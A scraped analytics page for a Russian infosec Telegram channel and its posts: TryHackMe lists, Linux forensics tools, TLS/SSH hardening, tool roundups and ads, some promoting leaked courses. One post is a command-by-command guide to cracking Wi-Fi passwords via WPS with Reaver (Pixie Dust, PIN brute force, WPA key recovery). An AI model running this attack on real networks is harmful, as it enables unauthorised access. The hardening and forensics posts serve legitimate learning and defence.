CodeGuard: PySec Edition
关闭频道
Канал по ИБ и этичному хакингу. Автор: @Arakcheev_Ruslan Ссылка: @invite_CodeGuard Рекламный менеджер: @Diggsale Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy
显示更多📈 Telegram 频道 CodeGuard: PySec Edition 的分析概览
频道 CodeGuard: PySec Edition 是活跃参与者。目前社区聚集了 14 097 名订阅者,在 技术与应用 类别中位列第 8 760,并在 俄罗斯 地区排名第 45 869 位。
📊 受众指标与增长动态
自 невідомо 创建以来,项目保持高速增长,吸引了 14 097 名订阅者。
根据 26 九月, 2026 的最新数据,频道保持稳定运转。过去 30 天订阅人数变化为 821,过去 24 小时变化为 0,整体触达仍然可观。
- 认证状态: 未认证
- 互动率 (ER): 平均受众互动率为 9.98%。内容发布后 24 小时内通常能获得 5.58% 的反应,占订阅者总量。
- 帖子覆盖: 每篇帖子平均可获得 1 407 次浏览,首日通常累积 786 次浏览。
- 互动与反馈: 受众积极参与,单帖平均反应数为 8。
- 主题关注点: 内容集中在 codeguard, pysec, docker, grep, контейнер 等核心主题上。
📝 描述与内容策略
作者将该频道定位为表达主观观点的平台:
“Канал по ИБ и этичному хакингу.
Автор: @Arakcheev_Ruslan
Ссылка: @invite_CodeGuard
Рекламный менеджер: @Diggsale
Биржа: https://telega.in/c/+3X56uL4A-UM3Njgy”
凭借高频更新(最新数据采集于 27 九月, 2026),频道始终保持新鲜度与高覆盖。分析显示受众积极互动,使其成为 技术与应用 类别中的关键影响点。
14 097
订阅者
无数据24 小时
+2477 天
+82130 天
帖子存档
14 091
😍 TryHackMe-Roadmap: 350+ бесплатных комнат по ИБ в одном репозитории
«~» Шедевро-репозиторий представляет собой живую подборку из нескольких сотен бесплатных комнат TryHackMe, разложенных по удобным разделам с разными уровнями и темами📌 Какие разделы есть внутри:
🎥 Fundamentals: вводные комнаты, Linux/Windows‑база, принципы безопасности, первые пентест‑сценарии 🎥 Тематические ветки: Recon, Scripting, Web, Forensics, Malware Analysis, PrivEsc, Active Directory, PCAP, Buffer Overflow 🎥 CTF‑блоки: CTF всех уровней + спец‑ивенты вроде Advent of Cyber, чтобы качать навык решения задач под разным уровнем боли в пятой точке🤩 Репозиторий удобно использовать как чек‑лист для обучения кибербезу — отметили, что уже прошли, выбрали следующую тему, закрепили практикой на TryHackMe без бесконечного скролла каталога комнат. Все просто 😏 😈 CodeGuard: PySec Edition | Чат
14 091
⚡️⚠️📊Сделал подборку рекомендую вам ознакомьтесь 🤙
• Арсенал Безопасника — Лучшие инструменты для хакинга и OSINT
• Хакер | Red Team — Библиотека Хакера тут вы найдете только эксклюзив! Автор делится лучшим. (новинка)
• Max Open Source — Полезные статьи и бесплатные курсы по этическому хакингу, пентесту, программированию и информационным технологиям.
• IT MEGA — Тут эксклюзивные материалы, курсы по программированию, информационная безопасность хакингу, Osint и IT.
• Книги | Books — Одна из крупных библиотек в сегменте Telegram. Тысячи книг и полезного материала.
• Библиотека Cobalt Strike — Все для знакомства с хакингом, пентестом, эксклюзивной информация, курсы, книги, статьи и инструменты.
• Журнал Хакер — Журнал хакер, канал архив, все выпуски с 1999- до последнего! Удивительный мир!
• Библиотека разведчика Osint — Единственная в своем роде библиотека по теме OSINT, разведки в сети, сбору информации, технологии конкурентной разведки, поиск о цели.
‼️ В общей сложности, данные проекты насчитывают терабайты курсов и книг. Присоединяйся 📲💻
14 091
🧬 Linux-форензика: с чего нужно начать разбор системы?
— Собрал для вас мини‑подборку по Linux‑форензике со шпаргалками команд, тулкитами и утилитами для живого анализа и последующего разбора образов
💬 Шпаргалки и методички:
1️⃣ Linux Command Line Forensics and Intrusion Detection — Набор базовых команд для быстрого осмотра живой Linux‑системы: процессы, сетевые соединения, пользователи, cron, бинарники, логи 2️⃣ Linux Forensics Cheatsheet — Краткие сводки по основным артефактам: auth‑логи, системные журналы, history, bashrc, SSH‑ключи, cron, временные файлы 3️⃣ Linux Forensic Artifact Cheatsheet — Шпаргалка с фокусом на артефакты и инструменты: LiME и AVML для дампа памяти, Volatility и Rekall для анализа, Sleuth Kit и Autopsy для дисков, Plaso и log2timeline для таймлайнов👁️ Инструменты и дистрибутивы:
4️⃣ LiME и AVML — LiME и AVML позволяют аккуратно снять дамп RAM с Linux‑системы, чтобы потом разбирать его 5️⃣ Volatility и Rekall — Фреймворки для работы с дампами: процессы, модули ядра, скрытые процессы, сетевые сессии, артефакты малвари 6️⃣ The Sleuth Kit — Набор утилит и GUI‑оболочка для анализа образов дисков: файловые системы, удалённые файлы, метаданные, временные метки, артефакты браузера и пользователя 7️⃣ Plaso — Инструмент, который собирает события из логов, файловой системы и артефактов в единый временной ряд🤡 Живой IR и автоматизация
8️⃣ Linux live forensics — Практические разборы инцидентов на живых Linux‑серверах: какие данные собирать в первые минуты, чем это грозит для целостности артефактов и как автоматизировать сбор 9️⃣ LINReS — Open source‑скрипт под live‑IR: собирает volatile и non‑volatile данные с подозрительного хоста и отправляет их на форензик‑станцию по заранее поднятым каналамНабираем 15 реакций и я дропаю минимальный чек‑лист по теме «Что сделать в первые 10–15 минут на скомпрометированном Linux‑хосте» с конкретными командами 🔑 😈 CodeGuard: PySec Edition | Чат
14 091
🧠 С ЭТИМ САЙТОМ ТЫ СОВЕРШЕННО БЕСПЛАТНО ПРОЙДЕШЬ ВСЮ БАЗУ ПО ИИ И РАБОТЕ С ДАННЫМИ
🫶 Что это за чудо такое?
🎥 Cognitive Class — образовательная платформа от IBM с сотней бесплатных курсов и проектов по искусственному интеллекту, data science и облачным технологиям и смежным темам
📚 Темы, которые закрывает платформа:
— Базовый и продвинутый data science: Python, анализ данных, визуализация, машинное обучение, работа с реальными датасетами — ИИ и ML: вводные по AI, классические алгоритмы, нейросети, NLP, компьютерное зрение — Облака и big data: основы cloud‑вычислений, работа с Hadoop и Spark, построение решений в облаке📎 Отдельный плюс: За прохождение многих треков можно получить сертификаты и бейджи, которые удобно прикладывать к резюме и профилю 😈 CodeGuard: PySec Edition | Чат
14 091
☄️В преддверии Нового года айтишник из “Matrix” скупил все курсы топовых IT-школ и выложил 5 ТБ слитых курсов к себе в каналы!
👩💻 Python:
https://t.me/+kBPlIQ1kpHw0YmQy
👩💻 Все ЯП:
https://t.me/+pkvOZc3g5gU3YTEy
👩💻 Backend:
https://t.me/+QRq_LSpodJ80NjE6
📱 Frontend и Web:
https://t.me/+jOItOzJamrNhOTIy
👩💻 Графика и дизайн:
https://t.me/+lxe3X0QQXVk2NWIy
Все материалы в закрепе и постоянно пополняются👆
14 091
🔐 АТАКУЕМ WI-FI C WPS ПРИ ИСПОЛЬЗОВАНИИ REAVER — Практический гайд
«~» WPS — это удобная настройка Wi‑Fi по кнопке или пину, которая сильно упрощает жизнь пользователю, но делает сеть уязвимой для перебора. В статье по ссылке говорится как правильно провести этот самый перебор. Делюсь своим опытом, как я организовывал подобную атаку по данному материалу🤩 Шаг 1. Готовим карту и систему: Нам понадобится карта с режимом монитора и инъекциями (Atheros часто ведёт себя лучше всего с Reaver) — Отключаем всё лишнее:
sudo systemctl stop NetworkManager
sudo airmon-ng check kill
— Смотрим интерфейс:
sudo iw dev
— Переводим wlan0 в монитор‑режим:
sudo ip link set wlan0 down
sudo iw wlan0 set monitor control
sudo ip link set wlan0 up
🔍 Шаг 2. Ищем точки с включённым WPS: Для разведки возьмем wash (идёт в комплекте с Reaver)
sudo wash -i wlan0
— Ждем пару минут и смотрим колонки:
🎥 BSSID – MAC точки
🎥 Ch – канал
🎥 WPS – версия WPS
🎥 Lck – блокировка WPS (No — интересует, Yes — можно пройти мимо)
🎥 ESSID – имя сети
(Для атаки подойдут только те, у кого Lck = No)
💀 Шаг 3. Проверим Pixie Dust через Reaver: Если точка уязвима к Pixie Dust, PIN можно вытащить почти сразу, без долгого онлайнового перебора
— Берем BSSID из вывода wash, например:
EE:43:F6:CF:C3:08
— Запускаем проверку:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -K
— Если роутер уязвим, Reaver покажет PIN вида:
WPS pin: 36158805
(На этом этапе у нас есть PIN, но все ещё нет WPA‑пароля)
👾 Шаг 4. Полный перебор WPS PIN, если Pixie не зашёл: Если Pixie Dust не сработал и PIN’ы не подошли, остаётся классический перебор:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -vv
— Ключи -v/-vv/-vvv увеличивают подробность вывода и помогают понять, на чём всё ломается
>> За счёт уязвимости протокола WPS реальное пространство перебора — всего около 11 000 комбинаций, а не десятки миллионов, поэтому это задача на пару часов для опытных спецов
🤲 Шаг 5. Если у нас уже есть PIN, то достаем WPA‑пароль: Если PIN уже известен, можно попросить Reaver вытащить WPA‑пароль напрямую:
sudo reaver -i wlan0 -b EE:43:F6:CF:C3:08 -p 36158805 -vv
— В успешном сценарии на выходе получаю строку с PSK: это и есть пароль от Wi‑Fi
🛡 Как наоборот защититься от атак?
>> С точки зрения защиты единственный надёжный шаг, это отключить WPS с PIN в настройках роутера. Если производитель позволяет, плюсом включить блокировку WPS
😈 CodeGuard: PySec Edition | Чат14 091
👾 «Реагирование на инциденты и управление рисками безопасности»: Практический курс про то, как работать с реальными инцидентами
— Разработан под тех, кто хочет уметь не только ловить алерты, но и разруливать последствия для бизнеса, даже когда ресурсов и людей минимум
🌐 Что разберёте на курсе:
— Как выстраивать процесс реагирования от обнаружения атаки и разбора логов до ликвидации и пост‑анализа — Как работать с киберрисками: выявлять активы и уязвимости, оценивать влияние инцидента на бизнес, выбирать, какие риски можно реально снижать, а какие наоборот осознанно принимать — Как использовать open source‑инструменты и простые практики, когда SIEM за миллионы не завезли, а инциденты уже есть💡 Также приятно то, что упор сделан на реальные кейсы и разбор типовых факапов: ошибки в коммуникации, неправильную приоритизацию, отсутствие плана IRP и документации — все то, что в жизни ломается куда чаще, чем сами технологии. ➡️ Забрать курс 😈 CodeGuard: PySec Edition | Чат
14 091
Держите 6 хороших каналов по искусственному интеллекту и нейросетям для любого уровня.
Можешь выбрать сам:
🤖 AI — @ai_prompt
📱 Нейросети — @neuro_prompt
📱 Python — @python_prompt
🤔 InfoSec — @infosec_prompt
👩💻 IT Новости — @it_news
😄 IT Мемы — @it_memes
Обучение, правильные промпты, разборы и полезные ресурсы на каждую тему!
14 091
+1
Готовлю новый канал CodeGuard: Academy
Сижу над ним потно, чтобы там было прям годнота для своих. Поддержи подпиской: тебе секунда, а мне мотивация пилить контент.
👉 https://t.me/+XI5KQ-XdAow3YWMy
😈 CodeGuard: PySec Edition | Чат
14 091
🧠 «Социальная инженерия и этичный хакинг на практике» Джо Грея — это практический мануал по тому, как этично закрывать дырки в процессах безопасности
Книга показывает, почему даже идеально настроенный периметр бессилен, если сотрудники сами выдают доступы, кликают по ссылкам и доверяют админам по телефону🌟 Что внутри книги? — Психология атак: какие триггеры используют социнженеры и как из них собираются сценарии фишинга — Практический OSINT и подготовка атак, как по открытым источникам собрать досье на компанию и людей — Этичный пентест людей: структуры фишинговых кампаний + рекомендации, как результаты таких тестов превращать в обучение 💡 Чем так хороша эта книга? >> Она является хорошим мостом между технарями и человеческим периметром. После прочтения книги проще объяснить бизнесу, почему защиты от людей нужны не меньше, чем новый firewall 📕 Ссылка на книгу как всегда в нашем архиве — [ARCHIVE] 😈 CodeGuard: PySec Edition | Чат
14 091
⚠️ Git: мини-шпаргалка по жизненному циклу изменений
1️⃣ Working Directory: Здесь правите файлы, запускаете тесты и ломаете всё, что можно
—
git add: нужен, чтобы перенести выбранные изменения в подготовительную область
2️⃣ Staging: Снимок того, что пойдёт в следующий коммит
—git commit: зафиксировать содержимое staging в локальном репозитории
3️⃣ Local Repository: История всех ваших коммитов на машине
—git push: отправить локальные коммиты на сервер
—git fetch: забрать новые коммиты с сервера без слияния
—git pull – fetch + авто‑слияние в текущую ветку
5️⃣ Stash: Когда нужно убрать со стола, но ещё рано коммитить
— git stash: спрятать незакоммиченные изменения
— git stash apply: вернуть изменения, не очищая stash
— git stash pop: вернуть и одновременно удалить запись из stash
5️⃣ Remote Repository
— Общий репо проекта на GitHub / GitLab / Bitbucket, куда пушит вся команда
😈 CodeGuard: PySec Edition | Чат14 091
🥷 Стажировки и вакансии по ИБ и OSINT
- Вакансии которых нет на джоб-агрегаторах
- Только прямые контакты HR в Telegram
👉 @jobs_ib
Пока другие листают джоб-сайты — ты уже пишешь HR в Telegram.
14 091
🔐 Практика: как руками проверить и подкрутить безопасные протоколы связи
«~» Теорию про знает каждый второй, а вот тех, кто реально открывал конфиг и бил по нему в разы меньше. Подготовил для вас практический чек-лист, который подойдет к любому серверу1️⃣ Проверяем TLS: что торчит наружу — Быстрый скан протоколов и шифров:
nmap --script ssl-enum-ciphers -p 443 example.com
В выводе смотрим:
🎥 Отключены ли SSLv2/3 и старые TLS 1.0/1.1
🎥 Нет ли древних шифров вроде 3DES/RC4
🎥 Используется ли современный TLS 1.2/1.3 с AES‑GCM или CHACHA20
2️⃣ Смотрим сертификат через openssl
echo QUIT | openssl s_client -connect example.com:443 2>/dev/null \
| openssl x509 -noout -issuer -dates -subject
— Проверяем кто выдал сертификат, не истёк ли он и корректен ли subject/сан‑имена. Полезно для быстрой диагностики и проверки сторонних сервисов без GUI
3️⃣ Жёстко настраиваем SSH, акцентируем внимание на ключи и современные шифры
— Резервная копия и правка конфига:
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak
sudo nano /etc/ssh/sshd_config
Базовый набор, который стоит включить почти везде:
Protocol 2
PasswordAuthentication no
PermitRootLogin no
ClientAliveInterval 300
ClientAliveCountMax 2
После изменений:
sudo systemctl restart sshd
— Так вы режете логин по паролю, прямой root и вешаете таймаут на вечные зависшие сессии
После такого цикла безопасность протоколов начинает ощущаться как осязаемый набор рычагов, за которые можно дёргать самому, пользуемся 😎
😈 CodeGuard: PySec Edition | Чат14 091
🤩 Подборка лучших GitHub-репозиториев для ИБ-специалистов
1) Raccoon — Высокопроизводительный сканер для рекогносцировки: с DNS, портами, веб‑фингерпринтингом, всё в одном CLI 2) BlueTeam-Tools — Собрание инструментов для blue team: мониторинг, лог‑анализ, форензика, DLP, сетевые сенсоры и т.п. 3) Awesome Annual Security Reports — Годовые отчёты по угрозам, инцидентам и трендам от разных компаний 4) OSSEC — Хостовый IDS с мониторингом логов, файловой системой, rootkit‑чекером, алертамм по правилам 5) SafeLine — Высокопроизводительный прокси с встроенным WAF: защита HTTP‑трафика, правила, дашборд, удобный деплой в Docker/K8s. 6) ZAP — Прокси‑сканер приложений: пассивный и активный поиск уязвимостей, фуззинг, API для автоматизации 7) Radare2 и Cutter — Radare 2 это CLI‑фреймворк для анализа бинарей и памяти. Вместе с GUI‑фронтендом Cutter покрывает большую часть задач реверса и отладки 8) Cuckoo Sandbox — Песочница для автоматического запуска подозрительных образцов, имеет настройку поведения, сетевого трафика, артефактов в системе 9) AutoRecon — Фреймворк, который запускает цепочку проверок и раскладывает результаты по папкам 10) pcileech — Инструменты для работы через PCIe/DMA (dump/patch RAM, обход аутентификации и т.п.)😈 CodeGuard: PySec Edition | Чат
14 091
Айтишников в 2025 году больше, чем цыган. И каждый, естественно, хочет быть видным сеньором, свою геймдев-студию, 15.000€ зэпэшечку и больше никогда не выходить на рабочие созвоны.
И как быть новичку сегодня? Или айтишнику, решившему сменить сферу деятельности. Бери менторство по ИБ. Кибербезопасность сейчас на подъеме, поэтому даже для ITшника это будет сильное конкурентное преимущество и спидран на буст навыков с нуля.
➦ От корки до корки узнаешь индустрию. Кто много платит и ищет специалистов, какие есть направления.
➦ Получишь все хард и софт скиллы для работы в нише.
➦ Заимеешь переговорные навыки и научишься писать идеальные резюме.
Даже если ты уже работаешь в киберсеке, но чувствуешь, что нуждаешься в левел-апе — ю а вэлком.
А еще у нас для тебя есть разовые консультации и помощь в составлении резюме. Почитай подробности: https://t.me/+_F4FzzaOTQk2N2Qy
14 091
🤨 Burp Suite за 1 час: из хаоса вкладок в рабочий инструмент
«•» После просмотра этого видео Burp перестанет выглядеть как страшная панель с сотней кнопок и превратится в понятный рабочий инструмент 🗒 В уроке автор спокойно проходит весь путь работы с ним: — Разбор настройки прокси — Перехват и правка HTTP‑запросов — Наглядная работа с Repeater и Intruder — Обучение поиску уязвимостей на тестовом приложении ➕ Отдельный плюс — автор делает упор на реальные приёмы: где смотреть параметры, как быстро гонять payload’ы и на что обращать внимание при тестировании веб‑приложений 📎 Смотрим и закрепляем свои знания *здесь* 😈 CodeGuard: PySec Edition | Чат
14 091
⚠️ Taranis AI — инструмент, превращающий OSINT‑поток в осмысленную ленту, а не в свалку ссылок
—> Веб-движок умеет сам ходить по сайтам и другим открытым источникам, собирать новости и статьи, прогонять их через NLP и вытаскивать из текста сущности и ключевые факты🔇 Что делает Taranis AI: 1) Агрегирует сырые OSINT‑события в единую ленту 2) Нормализует и обогащает контент через NER, дедупликацию, выделение важных сигналов 3) Поддерживает совместную работу команд и обмен историями через MISP 🔑 Taranis AI отлично подходит как ядро OSINT‑процесса для blue‑team: он берёт на себя рутину сбора и первичной обработки, а аналитик тратит время только на интерпретацию и принятие решений 😈 CodeGuard: PySec Edition | Чат
14 091
Изоляция рунета ближе, чем ты думаешь
Loading … ██████████████] 99%Роскомнадзору дали карт-бланш на блокировки, а «белые списки» сайтов тестируют уже в десятках регионов. И гайки будут закручиваться только сильнее. Чтобы в одночасье не лишиться доступа к свободному Интернету, просто сохрани Only Hack. Тут профессиональный хакер делится фишками, с которыми доступ к глобальной сети у тебя будет даже в случае ядерного апокалипсиса. Не жди момента «Х». Перестрахуйся подпиской.
14 091
💻 Smap — тихий сканер портов на базе Shodan
«~» Обычно Nmap сам ломится к целям в дверь, smap же делает все аккуратнее. Он берёт уже готовые данные у Shodan и собирает по ним картину открытых портов и сервисов, без всяких SYN‑флудов🔑 ЧТО ОН УМЕЕТ? 1. Drop‑in замена Nmap — Принимает те же ключи -p, -o*, -iL, -h и выдаёт выход в привычных форматах (-oX, -oG, -oN, -oA) 2. До 200 хостов/сек без сканирования сети — По факту мы лишь дергаем бесплатный Shodan API, а Smap отвечает скоростью и не светит ваш IP 3. Версии сервисов и уязвимости — Smap подтягивает баннеры, версии и связанные CVE/теги. В формате -oS можно увидеть уязвимости и метки Shodan 🥸 Помимо nmap‑форматов у него есть и свои:
-oP — список IP:PORT построчно для пайплайнов и других тулов -oJ — JSON -oS — фирменный Smap‑формат с тегами и уязвимостями⭐️ Ставим Smap себе здесь 😈 CodeGuard: PySec Edition | Чат
